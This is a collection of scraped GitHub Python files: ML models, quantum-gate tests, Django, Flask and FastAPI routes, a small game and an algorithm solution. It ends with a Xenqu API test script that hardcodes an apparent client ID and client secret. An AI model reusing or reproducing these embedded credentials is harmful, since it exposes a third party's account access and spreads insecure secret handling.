''\ntest4= '{a,b}c{d,e}f'\nprint(solution.expand(test3))\n","repo_name":"doria112/SANDBOX","sub_path":"doria112/lc/1087_brace_expansion.py","file_name":"1087_brace_expansion.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42555900692","text":"import torch\nimport numpy as np\n\nfrom sklearn.gaussian_process import kernels\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics.pairwise import pairwise_kernels\n\ndef _alpha_func(pi, lambda_):\n return 1 / (lambda_ * pi) + 1 - 1 / (lambda_)\n\n\ndef _beta_func(pi, lambda_):\n return lambda_ / (pi) + 1 - lambda_\n\n\nclass KernelRegressor:\n def __init__(\n self,\n initial_length_scale=1.0,\n propensity_model=None,\n verbose=False,\n ):\n self.kernel = kernels.RBF(length_scale=initial_length_scale)\n if propensity_model is None:\n self.propensity_model = LogisticRegression()\n else:\n self.propensity_model = propensity_model\n\n self._gamma = None\n self.alpha_0 = None\n self.alpha_1 = None\n self.beta_0 = None\n self.beta_1 = None\n self.verbose = verbose\n\n def fit(self, X, A, Y):\n idx = np.argsort(Y.ravel())\n self.x = X[idx]\n self.t = A[idx].reshape(-1, 1)\n self.y = Y[idx].reshape(-1, 1)\n self.s = self.y.std()\n self.m = self.y.mean()\n self.propensity_model.fit(self.x, self.t.ravel())\n self.e = self.propensity_model.predict_proba(self.x)[:, -1:]\n\n def predict(self, X, gamma):\n self._gamma = gamma\n self.alpha_0 = _alpha_func(pi=1 - self.e, lambda_=gamma)\n self.alpha_1 = _alpha_func(pi=self.e, lambda_=gamma)\n\n self.beta_0 = _beta_func(pi=1 - self.e, lambda_=gamma)\n self.beta_1 = _beta_func(pi=self.e, lambda_=gamma)\n\n k = self.k(X)\n\n lambda_top_1 = []\n lambda_top_0 = []\n lambda_bottom_1 = []\n lambda_bottom_0 = []\n for i in range(k.shape[0]):\n lambda_top_1.append(self.lambda_top_1(i, k).reshape(1, -1))\n lambda_top_0.append(self.lambda_top_0(i, k).reshape(1, -1))\n lambda_bottom_1.append(self.lambda_bottom_1(i, k).reshape(1, -1))\n lambda_bottom_0.append(self.lambda_bottom_0(i, k).reshape(1, -1))\n lambda_top_1 = np.vstack(lambda_top_1)\n lambda_top_0 = 
np.vstack(lambda_top_0)\n lambda_bottom_1 = np.vstack(lambda_bottom_1)\n lambda_bottom_0 = np.vstack(lambda_bottom_0)\n\n tau_top = []\n tau_bottom = []\n for i in range(k.shape[0]):\n tau_top.append(\n lambda_top_1[:, i : i + 1].max(axis=0)\n - lambda_bottom_0[:, i : i + 1].min(axis=0)\n )\n tau_bottom.append(\n lambda_bottom_1[:, i : i + 1].min(axis=0)\n - lambda_top_0[:, i : i + 1].max(axis=0)\n )\n tau_top = np.stack(tau_top)\n tau_bottom = np.stack(tau_bottom)\n tau_mean = self.tau(k=k)\n return tau_mean, tau_bottom, tau_top\n\n def k(self, x):\n return pairwise_kernels(\n self.embed(x), self.embed(self.x), metric=self.kernel, filter_params=True\n )\n\n def mu0_w(self, w, k):\n return np.matmul(k, (1 - self.t) * self.y * w) / (\n np.matmul(k, (1 - self.t) * w) + 1e-7\n )\n\n def mu1_w(self, w, k):\n return np.matmul(k, self.t * self.y * w) / (np.matmul(k, self.t * w) + 1e-7)\n\n def lambda_top_0(self, u, k):\n t = 1 - self.t\n alpha = np.matmul(k[:, :u], t[:u] * self.alpha_0[:u])\n beta = np.matmul(k[:, u:], t[u:] * self.beta_0[u:])\n alpha_y = np.matmul(k[:, :u], t[:u] * self.alpha_0[:u] * self.y[:u])\n beta_y = np.matmul(k[:, u:], t[u:] * self.beta_0[u:] * self.y[u:])\n return (alpha_y + beta_y) / (alpha + beta)\n\n def lambda_top_1(self, u, k):\n t = self.t\n alpha = np.matmul(k[:, :u], t[:u] * self.alpha_1[:u])\n beta = np.matmul(k[:, u:], t[u:] * self.beta_1[u:])\n alpha_y = np.matmul(k[:, :u], t[:u] * self.alpha_1[:u] * self.y[:u])\n beta_y = np.matmul(k[:, u:], t[u:] * self.beta_1[u:] * self.y[u:])\n return (alpha_y + beta_y) / (alpha + beta)\n\n def lambda_bottom_0(self, u, k):\n t = 1 - self.t\n alpha = np.matmul(k[:, u:], t[u:] * self.alpha_0[u:])\n beta = np.matmul(k[:, :u], t[:u] * self.beta_0[:u])\n alpha_y = np.matmul(k[:, u:], t[u:] * self.alpha_0[u:] * self.y[u:])\n beta_y = np.matmul(k[:, :u], t[:u] * self.beta_0[:u] * self.y[:u])\n return (alpha_y + beta_y) / (alpha + beta)\n\n def lambda_bottom_1(self, u, k):\n t = self.t\n alpha = np.matmul(k[:, u:], t[u:] * self.alpha_1[u:])\n beta = np.matmul(k[:, :u], t[:u] * self.beta_1[:u])\n alpha_y = np.matmul(k[:, u:], t[u:] * self.alpha_1[u:] * self.y[u:])\n beta_y = np.matmul(k[:, :u], t[:u] * self.beta_1[:u] * self.y[:u])\n return (alpha_y + beta_y) / (alpha + beta)\n\n def mu0(self, k):\n return self.mu0_w(w=(1 - self.e) ** -1, k=k)\n\n def mu1(self, k):\n return self.mu1_w(w=self.e ** -1, k=k)\n\n def tau(self, k):\n return self.mu1(k) - self.mu0(k)\n\n def fit_length_scale(self, dataset, grid):\n best_err = np.inf\n best_h = None\n count = 0\n for h in grid:\n kernel = kernels.RBF(length_scale=h)\n k = pairwise_kernels(\n self.embed(dataset.x),\n self.embed(self.x),\n metric=kernel,\n filter_params=False,\n )\n mu0 = self.mu0(k)\n mu1 = self.mu1(k)\n y = dataset.y.reshape(-1, 1)\n t = dataset.t.reshape(-1, 1)\n err0 = mean_squared_error(y[t == 0], mu0[t == 0])\n err1 = mean_squared_error(y[t == 1], mu1[t == 1])\n err = err0 + err1\n if err < best_err:\n best_err = err\n best_h = h\n count = 0\n elif count < 20:\n count += 1\n else:\n break\n if self.verbose:\n print(f\"h-{h:.03f}_err-{err:.03f}\")\n self.kernel.length_scale = best_h\n\n def embed(self, x):\n return x","repo_name":"CausalML/BLearner","sub_path":"models/kernel/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1029222068","text":"import numpy as np\r\nimport tflearn\r\nfrom tflearn.data_preprocessing import 
ImagePreprocessing\r\nfrom tflearn.data_augmentation import ImageAugmentation\r\nfrom tflearn.layers.core import input_data, dropout, fully_connected\r\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\r\nfrom tflearn.layers.estimator import regression\r\n\r\n# Real-time data preprocessing for training and testing\r\nimg_pre = ImagePreprocessing()\r\n# Zero-center the data (mean subtraction)\r\nimg_pre.add_featurewise_zero_center()\r\n# Normalize by the standard deviation\r\nimg_pre.add_featurewise_stdnorm()\r\n\r\n# Real-time data augmentation during training\r\nimg_aug = ImageAugmentation()\r\n# Random left-right flip\r\nimg_aug.add_random_flip_leftright()\r\n# Random rotation\r\nimg_aug.add_random_rotation(max_angle=25.)\r\n\r\n# CNN model\r\n# 3 convolutional layers, 2 max-pooling layers, 2 fully connected layers\r\n# Input: batch*32*32*3\r\nnetwork = input_data(shape=[None, 32, 32, 3], data_preprocessing=img_pre, data_augmentation=img_aug)\r\n# Conv layer 1: 32 kernels of size 3*3*3*32, ReLU activation\r\nnetwork = conv_2d(network, 32, 3, activation='relu')\r\n# Max-pooling layer 1: same kernel size as conv, strides=2\r\nnetwork = max_pool_2d(network, 2)\r\n# Conv layer 2: 64 kernels\r\nnetwork = conv_2d(network, 64, 3, activation='relu')\r\n# Conv layer 3\r\nnetwork = conv_2d(network, 64, 3, activation='relu')\r\n# Max-pooling layer 2\r\nnetwork = max_pool_2d(network, 2)\r\n# Fully connected layer 1: 512 neurons\r\nnetwork = fully_connected(network, 512, activation='relu')\r\n # dropout: keep 50%\r\nnetwork = dropout(network, 0.5)\r\n# Fully connected layer 2: 10 neurons with Softmax activation\r\nnetwork = fully_connected(network, 10, activation='softmax')\r\n # Optimizer: Adam, loss: cross-entropy, learning rate: 0.001\r\nnetwork = regression(network, optimizer='adam', loss='categorical_crossentropy', learning_rate=0.001)\r\n# Tensorboard visualization\r\n# 0: Loss, Accuracy (Best Speed).\r\n# 1: Loss, Accuracy, Gradients.\r\n# 2: Loss, Accuracy, Gradients, Weights.\r\n# 3: Loss, Accuracy, Gradients, Weights, Activations, Sparsity.\r\nmodel = tflearn.DNN(network, tensorboard_verbose=1,tensorboard_dir='tflearn_logs/')\r\n","repo_name":"isjjhang/A-Simple-Image-Classification-based-on-CNN","sub_path":"CNN_Model.py","file_name":"CNN_Model.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33129914732","text":"import cmath\nimport copy\n\nimport numpy\nimport pytest\n\nfrom divya import MainEngine\nfrom divya.cengines import DummyEngine\nfrom divya.ops import BasicGate, NotMergeable, Ph, QubitOperator\nfrom divya.ops import _time_evolution as te\n\n@pytest.mark.parametrize(\"coefficient\", [0.5, numpy.float64(2.303)])\ndef test_time_evolution_init_int_time(coefficient):\n    hamiltonian = coefficient * QubitOperator(\"X0 Z1\")\n    hamiltonian += QubitOperator(\"Z2\", 0.5)\n    gate1 = te.TimeEvolution(2, hamiltonian)\n    assert gate1.hamiltonian.isclose(hamiltonian)\n    assert gate1.time == 2\n\n@pytest.mark.parametrize(\"coefficient\", [0.5, numpy.float64(2.303)])\ndef test_init_float_time(coefficient):\n    hamiltonian = coefficient * QubitOperator(\"X0 Z1\")\n    hamiltonian += QubitOperator(\"Z2\", 0.5)\n    gate2 = te.TimeEvolution(2.1, hamiltonian)\n    assert gate2.hamiltonian.isclose(hamiltonian)\n    assert gate2.time == pytest.approx(2.1)\n\ndef test_init_makes_copy():\n    hamiltonian = QubitOperator(\"X0 Z1\")\n    gate = te.TimeEvolution(2.1, hamiltonian)\n    hamiltonian = None\n    assert gate.hamiltonian is not None\n\ndef test_init_bad_time():\n    hamiltonian = QubitOperator(\"Z2\", 0.5)\n    with pytest.raises(TypeError):\n        te.TimeEvolution(1.5j, hamiltonian)\n\ndef test_init_bad_hamiltonian():\n    with pytest.raises(TypeError):\n        te.TimeEvolution(2, \"something else\")\n\ndef test_init_not_hermitian():\n    hamiltonian = QubitOperator(\"Z2\", 1e-12j)\n    with pytest.raises(te.NotHermitianOperatorError):\n        
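# the non-zero imaginary coefficient above makes the operator non-Hermitian\n        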
te.TimeEvolution(1, hamiltonian)\n\ndef test_init_cast_complex_to_float():\n hamiltonian = QubitOperator(\"Z2\", 2 + 0j)\n gate = te.TimeEvolution(1, hamiltonian)\n assert isinstance(gate.hamiltonian.terms[((2, 'Z'),)], float)\n pytest.approx(gate.hamiltonian.terms[((2, 'Z'),)]) == 2.0\n\ndef test_init_negative_time():\n hamiltonian = QubitOperator(\"Z2\", 2)\n gate = te.TimeEvolution(-1, hamiltonian)\n assert gate.time == -1\n\ndef test_get_inverse():\n hamiltonian = QubitOperator(\"Z2\", 2)\n gate = te.TimeEvolution(2, hamiltonian)\n inverse = gate.get_inverse()\n assert gate.time == 2\n assert gate.hamiltonian.isclose(hamiltonian)\n assert inverse.time == -2\n assert inverse.hamiltonian.isclose(hamiltonian)\n\ndef test_get_merged_one_term():\n hamiltonian = QubitOperator(\"Z2\", 2)\n gate = te.TimeEvolution(2, hamiltonian)\n hamiltonian2 = QubitOperator(\"Z2\", 4)\n gate2 = te.TimeEvolution(5, hamiltonian2)\n merged = gate.get_merged(gate2)\n # This is not a requirement, the hamiltonian could also be the other\n # if we change implementation\n assert merged.hamiltonian.isclose(hamiltonian)\n assert merged.time == pytest.approx(12)\n\ndef test_get_merged_multiple_terms():\n hamiltonian = QubitOperator(\"Z2\", 2)\n hamiltonian += QubitOperator(\"X3\", 1)\n gate = te.TimeEvolution(2, hamiltonian)\n hamiltonian2 = QubitOperator(\"Z2\", 4)\n hamiltonian2 += QubitOperator(\"X3\", 2 + 1e-10)\n gate2 = te.TimeEvolution(5, hamiltonian2)\n merged = gate.get_merged(gate2)\n # This is not a requirement, the hamiltonian could also be the other\n # if we change implementation\n assert merged.hamiltonian.isclose(hamiltonian)\n assert merged.time == pytest.approx(12)\n\ndef test_get_merged_not_close_enough():\n hamiltonian = QubitOperator(\"Z2\", 2)\n hamiltonian += QubitOperator(\"X3\", 1)\n gate = te.TimeEvolution(2, hamiltonian)\n hamiltonian2 = QubitOperator(\"Z2\", 4)\n hamiltonian2 += QubitOperator(\"X3\", 2 + 1e-8)\n gate2 = te.TimeEvolution(5, hamiltonian2)\n with pytest.raises(NotMergeable):\n gate.get_merged(gate2)\n\ndef test_get_merged_bad_gate():\n hamiltonian = QubitOperator(\"Z2\", 2)\n gate = te.TimeEvolution(2, hamiltonian)\n other = BasicGate()\n with pytest.raises(NotMergeable):\n gate.get_merged(other)\n\ndef test_get_merged_different_hamiltonian():\n hamiltonian = QubitOperator(\"Z2\", 2)\n gate = te.TimeEvolution(2, hamiltonian)\n hamiltonian2 = QubitOperator(\"Y2\", 2)\n gate2 = te.TimeEvolution(2, hamiltonian2)\n with pytest.raises(NotMergeable):\n gate.get_merged(gate2)\n\ndef test_or_one_qubit():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qubit = eng.allocate_qubit()\n hamiltonian = QubitOperator(\"Z0\", 2)\n te.TimeEvolution(2.1, hamiltonian) | qubit[0]\n te.TimeEvolution(3, hamiltonian) | (qubit[0],)\n eng.flush()\n cmd1 = saving_backend.received_commands[1]\n assert cmd1.gate.hamiltonian.isclose(hamiltonian)\n assert cmd1.gate.time == pytest.approx(2.1)\n assert len(cmd1.qubits) == 1 and len(cmd1.qubits[0]) == 1\n assert cmd1.qubits[0][0].id == qubit[0].id\n cmd2 = saving_backend.received_commands[2]\n assert cmd2.gate.hamiltonian.isclose(hamiltonian)\n assert cmd2.gate.time == pytest.approx(3)\n assert len(cmd2.qubits) == 1 and len(cmd2.qubits[0]) == 1\n assert cmd2.qubits[0][0].id == qubit[0].id\n\ndef test_or_one_qureg():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(5)\n hamiltonian = QubitOperator(\"X0 Z4\", 
2)\n te.TimeEvolution(2.1, hamiltonian) | qureg\n te.TimeEvolution(3, hamiltonian) | (qureg,)\n eng.flush()\n rescaled_h = QubitOperator(\"X0 Z1\", 2)\n cmd1 = saving_backend.received_commands[5]\n assert cmd1.gate.hamiltonian.isclose(rescaled_h)\n assert cmd1.gate.time == pytest.approx(2.1)\n assert len(cmd1.qubits) == 1 and len(cmd1.qubits[0]) == 2\n assert cmd1.qubits[0][0].id == qureg[0].id\n assert cmd1.qubits[0][1].id == qureg[4].id\n cmd2 = saving_backend.received_commands[6]\n assert cmd2.gate.hamiltonian.isclose(rescaled_h)\n assert cmd2.gate.time == pytest.approx(3)\n assert len(cmd2.qubits) == 1 and len(cmd2.qubits[0]) == 2\n assert cmd2.qubits[0][0].id == qureg[0].id\n assert cmd2.qubits[0][1].id == qureg[4].id\n\ndef test_or_two_qubits_error():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(2)\n hamiltonian = QubitOperator(\"Z0\", 2)\n with pytest.raises(TypeError):\n te.TimeEvolution(2.1, hamiltonian) | (qureg[0], qureg[1])\n\ndef test_or_two_quregs_error():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(2)\n qureg2 = eng.allocate_qureg(2)\n hamiltonian = QubitOperator(\"Z0\", 2)\n with pytest.raises(TypeError):\n te.TimeEvolution(2.1, hamiltonian) | (qureg, qureg2)\n\ndef test_or_not_enough_qubits():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(2)\n hamiltonian = QubitOperator(\"Z0 X3\", 2)\n with pytest.raises(ValueError):\n te.TimeEvolution(2.1, hamiltonian) | qureg\n\ndef test_or_multiple_terms():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(4)\n hamiltonian = QubitOperator(\"X0 Z3\", 2)\n hamiltonian += QubitOperator(\"Y1\", 0.5)\n te.TimeEvolution(2.1, hamiltonian) | qureg\n eng.flush()\n rescaled_h = QubitOperator(\"X0 Z2\", 2)\n rescaled_h += QubitOperator(\"Y1\", 0.5)\n cmd1 = saving_backend.received_commands[4]\n assert cmd1.gate.hamiltonian.isclose(rescaled_h)\n assert cmd1.gate.time == pytest.approx(2.1)\n assert len(cmd1.qubits) == 1 and len(cmd1.qubits[0]) == 3\n assert cmd1.qubits[0][0].id == qureg[0].id\n assert cmd1.qubits[0][1].id == qureg[1].id\n assert cmd1.qubits[0][2].id == qureg[3].id\n\ndef test_or_gate_not_mutated():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(4)\n hamiltonian = QubitOperator(\"X0 Z3\", 2)\n hamiltonian += QubitOperator(\"Y1\", 0.5)\n correct_h = copy.deepcopy(hamiltonian)\n gate = te.TimeEvolution(2.1, hamiltonian)\n gate | qureg\n eng.flush()\n assert gate.hamiltonian.isclose(correct_h)\n assert gate.time == pytest.approx(2.1)\n\ndef test_or_gate_identity():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(4)\n hamiltonian = QubitOperator((), 3.4)\n correct_h = copy.deepcopy(hamiltonian) # noqa: F841\n gate = te.TimeEvolution(2.1, hamiltonian)\n gate | qureg\n eng.flush()\n cmd = saving_backend.received_commands[4]\n assert isinstance(cmd.gate, Ph)\n assert cmd.gate == Ph(-3.4 * 2.1)\n correct = numpy.array([[cmath.exp(-1j * 3.4 * 2.1), 0], [0, cmath.exp(-1j * 3.4 * 2.1)]])\n print(correct)\n print(cmd.gate.matrix)\n assert numpy.allclose(cmd.gate.matrix, correct)\n\ndef 
test_eq_not_implemented():\n hamiltonian = QubitOperator(\"X0 Z1\")\n gate = te.TimeEvolution(2.1, hamiltonian)\n assert gate.__eq__(\"0\") == NotImplemented\n\ndef test_ne_not_implemented():\n hamiltonian = QubitOperator(\"X0 Z1\")\n gate = te.TimeEvolution(2.1, hamiltonian)\n assert gate.__ne__(\"0\") == NotImplemented\n\ndef test_str():\n hamiltonian = QubitOperator(\"X0 Z1\")\n hamiltonian += QubitOperator(\"Y1\", 0.5)\n gate = te.TimeEvolution(2.1, hamiltonian)\n assert str(gate) == \"exp(-2.1j * (0.5 Y1 +\\n1.0 X0 Z1))\" or str(gate) == \"exp(-2.1j * (1.0 X0 Z1 +\\n0.5 Y1))\"","repo_name":"bhojpur/quantum","sub_path":"pkg/divya/ops/_time_evolution_test.py","file_name":"_time_evolution_test.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33556871529","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n # this view .asView() will actually be implemented as a class.\n # Inheriting from an existing generic view function\n # that already does most of what we want this view function to do,\n # rather than writing our own from scratch.\n path('books/', views.BookListView.as_view(), name='books'),\n path('book/', views.BookDetailView.as_view(), name='book-detail'),\n path('authors/', views.AuthorListView.as_view(), name='authors'),\n path('author/', views.AuthorDetailView.as_view(), name='author-detail'),\n\n]","repo_name":"agomezmartin/LocalLibraryDjango","sub_path":"locallibrary/catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70655219345","text":"from flask import Flask, request, redirect, render_template\nfrom os import urandom\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = str(urandom(24));\n\n@app.route('/')\ndef index():\n\treturn render_template(\"index.html\")\n\n@app.route('/greeting', methods = [\"POST\"])\ndef greeting():\n\tPOST_name = request.form[\"name\"]\n\treturn render_template(\"greeting.html\", name = POST_name)\n\nif __name__ == '__main__':\n\tapp.run(debug = True)\n","repo_name":"fossasia/Flask_Simple_Form","sub_path":"Spadi0/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1465,"dataset":"github-code","pt":"48"} +{"seq_id":"17847895611","text":"from fastapi import APIRouter\n\nimport models\nfrom core.exceptions import DatabaseItemNotFound\n\nrouter = APIRouter(prefix=\"/buildings\")\n\n\n@router.get(\"/\", response_model_by_alias=False)\ndef get_buildings() -> list[models.Building]:\n \"\"\"Get all buildings\"\"\"\n\n buildings = models.Building.find_all().to_list()\n return buildings\n\n\n@router.post(\"/\", status_code=201, response_model_by_alias=False)\ndef create_building(building: models.Building) -> models.Building:\n \"\"\"Create a new building\"\"\"\n\n building.create()\n\n return building\n\n\n@router.put(\"/{uid}\", response_model_by_alias=False)\ndef update_building(uid: str, changes: models.UpdateBuilding) -> models.Building:\n \"\"\"Update a Building with new values\"\"\"\n\n building = models.Building.get(uid).run()\n if not building:\n raise DatabaseItemNotFound(f\"Could not find Building with id: {uid}\")\n\n for key, value in changes.dict(exclude_unset=True).items():\n setattr(building, key, value)\n building.save()\n\n return 
building\n\n\n@router.delete(\"/{uid}\")\ndef delete_building(uid: str) -> str:\n \"\"\"Delete a Building\"\"\"\n\n building = models.Building.get(uid).run()\n if not building:\n raise DatabaseItemNotFound(f\"Could not find Building with id: {uid}\")\n building.delete()\n\n return uid\n","repo_name":"ocni-dtu/fastapi-tutorial","sub_path":"src/routes/building.py","file_name":"building.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4652802702","text":"#시간초과! 답 찾아봄 \nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n score = list(map(int, input().split()))\n case = [0] * (sum(score)+1)\n case[0] = 1\n res = [0]\n for s in score:\n for i in range(len(res)):\n if not case[s+res[i]]:\n case[s+res[i]] = 1\n res.append(s+res[i])\n print(f'#{tc} {len(res)}')\n ","repo_name":"Amyhds/codingtest","sub_path":"SWEA/D4/3752. 가능한 시험 점수/가능한 시험 점수.py","file_name":"가능한 시험 점수.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23788034247","text":"from pico2d import*\nimport random\nimport game_framework\nimport start_state\nimport main_state\nimport title_state\n\nBOY_SPEED = 20.0 #보이의 속도 조절\nMAX_ANIMATION_TIME = 0.1 #0.1초마다 애니메이션프레임을 증가시킨다. 애니메이션 프레임속도 조절\n\nAnimation_time =0\ncurrent_time = get_time()\n\nclass Grass:\n def __init__(self):\n self.image = load_image('grass.png')\n def draw(self):\n self.image.draw(400, 30)\n\nclass Boy:\n PIXEL_PER_METER = (10.0/0.3)\n RUN_SPEED_KMPH = BOY_SPEED\n RUN_SPEED_MPM = (RUN_SPEED_KMPH * 1000.0 / 60.0)\n RUN_SPEED_MPS = (RUN_SPEED_MPM / 60.0)\n RUN_SPEED_PPS = (RUN_SPEED_MPS * PIXEL_PER_METER)\n\n image = None\n\n LEFT_RUN, RIGHT_RUN, LEFT_STAND, RIGHT_STAND = 0,1,2,3\n stand_frames, run_frames =0,0\n def __init__(self):\n self.x, self.y = random.randint(100, 700), random.randint(50,550)\n self.frame = random.randint(0,7)\n self.dir =-1\n self.state = 0\n self.total_frames =0\n if Boy.image == None :\n Boy.image = load_image('인디아나존스실사그자체.png')\n\n\n\n\n\n def update(self):\n global current_time, Animation_time\n frame_time = get_time() - current_time\n frame_rate = 1.0 / frame_time\n Animation_time += frame_time\n print(\"Frame Rate: %f fps, Frame Time : %f sec, Animation_Time : %f \" % (frame_rate, frame_time, Animation_time))\n\n distance = Boy.RUN_SPEED_PPS* frame_time\n self.total_frames += 1.0\n if Animation_time> MAX_ANIMATION_TIME:\n self.frame = (self.frame +1)%7 #현재는 프레임마다 애니메이션이 바뀐다. 
\r\n            Animation_time = 0\r\n        self.x += (self.dir*distance)\r\n\r\n        if self.x>800:\r\n            self.dir = -1\r\n            self.x =800\r\n            self.state = self.LEFT_RUN\r\n            print(\"Change Time: %f, Total Frames : %d\" %(get_time(), self.total_frames))\r\n        if self.x < 0:\r\n            self.dir = 1\r\n            self.x = 0\r\n            self.state = self.RIGHT_RUN\r\n            print(\"Change Time: %f, Total Frames : %d\" %(get_time(), self.total_frames))\r\n        current_time += frame_time\r\n\r\n\r\n    \r\n    def draw(self):\r\n        self.image.clip_draw(self.frame*30,0, 30, 48, self.x, self.y)\r\n\r\n    \r\n    \r\ndef enter():\r\n    global boy, grass, team\r\n    grass = Grass()\r\n    boy = Boy()\r\n\r\n\r\n\r\n\r\ndef exit():\r\n    global boy, grass\r\n    del(boy)\r\n    del(grass)\r\n\r\ndef handle_events():\r\n    global select_num, RKC, LKC\r\n    events = get_events()\r\n    for event in events:\r\n        if event.type == SDL_QUIT:\r\n            game_framework.quit()\r\n        elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\r\n            game_framework.change_state(title_state)\r\n\r\n\r\ndef update():\r\n    boy.update()\r\n    # delay(0.01)\r\n\r\n\r\n\r\n\r\ndef draw():\r\n    clear_canvas()\r\n    grass.draw()\r\n    boy.draw()\r\n    update_canvas()\r\n\r\n\r\n\r\n","repo_name":"YounSup/2DGAME_GIT","sub_path":"과제/main_state.py","file_name":"main_state.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9713203886","text":"\nimport json\nimport time\nimport base64\nfrom typing import Literal\nfrom reportlab.pdfgen.canvas import Canvas\nfrom testing import account, contact, reports, forms\nfrom testing.tracking import tabs, records, queues, items\nfrom xenqu.models import Address, Contact\nfrom xenqu import XenquAPI\n\nclient_id = \"WKKXPxwS0UqGy0199MMA\"\nclient_secret = \"7BvzE387BoQOWWTOpQMLI8C88xhE9FkwQCCN2ZosBdw\"\nprivate_key = open('./privatekey.pem', 'rb').read()\nsubscriber = \"5f3ed190c32e5f000186bb76\"\n\napi = XenquAPI(clientId=client_id, clientSecret=client_secret, pemPrivateKey=private_key, subscriber=subscriber, baseUrl='https://stage.xenqu.com')\n\n##? Account Routes Testing\ndef accountTesting():\n    print('~~ Account ~~')\n    return (\n        # '~~ Account ~~\\n' +\n        account.main(api=api) +\n        '\\n'\n    )\n\n##? Contact Routes Testing\ndef contactTesting():\n    print('~~ Contact ~~')\n    return (\n        # '~~ Contact ~~\\n' + \n        contact.main(api=api) + \n        '\\n'\n    )\n\n##? [Tracking] -|- Tab\ndef trackingTabTesting():\n    print('~~ [Tracking] | Tab ~~')\n    return (\n        # '~~ [Tracking] | Tab ~~\\n' + \n        tabs.main(api=api) + \n        '\\n'\n    )\n\n##? [Tracking] -|- Records\ndef trackingRecordTesting():\n    print('~~ [Tracking] | Record ~~')\n    return (\n        records.main(api=api) + \n        '\\n'\n    )\n\n##? [Tracking] -|- Queue\ndef trackingQueueTesting():\n    print('~~ [Tracking] | Queue ~~')\n    return (\n        queues.main(api=api) + \n        '\\n'\n    )\n\n##? [Tracking] -|- Item\ndef trackingItemTesting():\n    print('~~ [Tracking] | Item ~~')\n    return (\n        items.main(api=api) + \n        '\\n'\n    )\n\n##? Form Routes Testing\ndef formTesting():\n    print('~~ Form ~~')\n    return (\n        forms.main(api=api) + \n        '\\n'\n    )\n\n##? 
Report Routes Testing\ndef reportTesting():\n print('~~ Report ~~')\n return (\n reports.main(api=api) + \n '\\n'\n )\n\ndef generatePDFTesting(instanceId: int):\n pdfId = json.loads(api.forms.getInstance(instanceId=instanceId))[\"definition\"][\"pdf_id\"]\n api.forms.generatePdf(instanceId=instanceId, signPdf=True, addInfoFooter=True)\n time.sleep(5.0)\n newPdfId = json.loads(api.forms.getInstance(instanceId=instanceId))[\"definition\"][\"pdf_id\"]\n\n if (pdfId == newPdfId):\n return \"Polling time was not long enough :/\"\n \n tempHandleId = json.loads(api.forms.getFormFile(instanceId=instanceId, filesId=newPdfId))[\"_temp_handle_id\"]\n file = api.files.download(tempHandleId=tempHandleId)\n pdf_path = './out.pdf'\n pdf_file = Canvas(pdf_path)\n with open(pdf_path, 'wb') as f:\n f.write(file)\n\ndef uploadFileTesting(fileBytes: bytes, fileType: Literal['pdf', 'jpeg', 'txt', 'png'] = 'pdf'):\n l = len(fileBytes)\n encoded_string = base64.b64encode(fileBytes).decode('utf-8')\n if fileType == 'pdf':\n r = api.files.upload(chunkData=f\"data:appication/pdf;base64,{encoded_string}\", chunkSeq=0, chunkStart=0, chunkEnd=l, chunkLimit=l, chunkSize=l, totalSize=l, totalChunks=1)\n elif fileType == 'txt':\n r = api.files.upload(chunkData=f\"data:text/plain;base64,{encoded_string}\", chunkSeq=0, chunkStart=0, chunkEnd=l, chunkLimit=l, chunkSize=l, totalSize=l, totalChunks=1)\n elif fileType == 'png':\n r = api.files.upload(chunkData=f\"data:image/png;base64,{encoded_string}\", chunkSeq=0, chunkStart=0, chunkEnd=l, chunkLimit=l, chunkSize=l, totalSize=l, totalChunks=1)\n else:\n r = api.files.upload(chunkData=f\"data:image/jpeg;base64,{encoded_string}\", chunkSeq=0, chunkStart=0, chunkEnd=l, chunkLimit=l, chunkSize=l, totalSize=l, totalChunks=1)\n\n with 